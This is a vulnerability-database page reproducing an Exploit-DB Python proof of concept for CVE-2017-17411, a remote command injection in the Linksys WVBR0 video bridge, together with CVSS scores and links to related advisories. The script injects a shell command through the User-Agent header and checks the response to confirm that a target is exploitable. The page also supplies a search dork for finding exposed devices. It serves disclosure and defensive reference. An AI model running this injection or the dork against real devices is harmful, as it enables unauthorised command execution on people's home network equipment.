Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbNixawkEDB-ID:43363
HistoryDec 14, 2017 - 12:00 a.m.

Linksys WVBR0 - 'User-Agent' Remote Command Injection

2017-12-1400:00:00
nixawk
www.exploit-db.com
29

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.6

Confidence

High

EPSS

0.974

Percentile

99.9%

JSON
#!/usr/bin/python
# -*- coding: utf-8 -*-

# Author: Nixawk
# CVE-2017-17411
# Linksys WVBR0 25 Command Injection

"""
$ python2.7 exploit-CVE-2017-17411.py
[*] Usage: python exploit-CVE-2017-17411.py <URL>

$ python2.7 exploit-CVE-2017-17411.py http://example.com/
[+] Target is exploitable by CVE-2017-17411
"""

import requests


def check(url):
    payload = '"; echo "admin'
    md5hash = "456b7016a916a4b178dd72b947c152b7"  # echo "admin" | md5sum

    resp = send_http_request(url, payload)

    if not resp:
        return False

    lines = resp.text.splitlines()
    sys_cmds = filter(lambda x: "config.webui sys_cmd" in x, lines)

    if not any([payload in sys_cmd for sys_cmd in sys_cmds]):
        return False

    if not any([md5hash in sys_cmd for sys_cmd in sys_cmds]):
        return False

    print("[+] Target is exploitable by CVE-2017-17411 ")
    return True


def send_http_request(url, payload):
    headers = {
        'User-Agent': payload
    }

    response = None
    try:
        response = requests.get(url, headers=headers)
    except Exception as err:
        log.exception(err)

    return response


if __name__ == '__main__':
    import sys

    if len(sys.argv) != 2:
        print("[*] Usage: python %s <URL>" % sys.argv[0])
        sys.exit(0)

    check(sys.argv[1])


# google dork: "Vendor:LINKSYS ModelName:WVBR0-25-US"

## References

# https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair
# https://thehackernews.com/2017/12/directv-wvb-hack.html

Related

exploitpack 1
nvd 1
zdt 2
openvas 1
exploitdb 1
cve 1
packetstorm 1
cvelist 1
zdi 1
checkpoint_advisories 1
metasploit 1
seebug 1
prion 1
exploitpack
exploitpack
Linksys WVBR0 - User-Agent Remote Command Injection
2017-12-14 00:00:00
nvd
nvd
CVE-2017-17411
2017-12-21 14:29:00
zdt
zdt
Linksys WVBR0 - User-Agent Remote Command Injection Exploit
2017-12-19 00:00:00
Linksys WVBR0-25 User-Agent Command Execution Exploit
2018-01-04 00:00:00
openvas
openvas
Linksys WVBRO25 RCE Vulnerability
2017-12-22 00:00:00
exploitdb
exploitdb
Linksys WVBR0-25 - User-Agent Command Execution (Metasploit)
2018-01-04 00:00:00
cve
cve
CVE-2017-17411
2017-12-21 14:29:00
packetstorm
packetstorm
Linksys WVBR0-25 User-Agent Command Execution
2018-01-04 00:00:00
cvelist
cvelist
CVE-2017-17411
2017-12-21 14:00:00
zdi
zdi
(0Day) Linksys WVBR0 User-Agent Command Injection Remote Code Execution Vulnerability
2017-12-18 00:00:00
checkpoint_advisories
checkpoint_advisories
Linksys WVBR0-25 Command Injection (CVE-2017-17411)
2018-05-28 00:00:00
metasploit
metasploit
Linksys WVBR0-25 User-Agent Command Execution
2017-12-21 23:44:35
seebug
seebug
Linksys WVBR0 25 Command Injection(CVE-2017-17411)
2017-12-15 00:00:00
prion
prion
Design/Logic Flaw
2017-12-21 14:29:00

CVSS2

10

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:C/I:C/A:C

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.6

Confidence

High

EPSS

0.974

Percentile

99.9%

JSON
Related for EDB-ID:43363
exploitpack1nvd1zdt2openvas1exploitdb1cve1packetstorm1cvelist1zdi1checkpoint_advisories1metasploit1seebug1prion1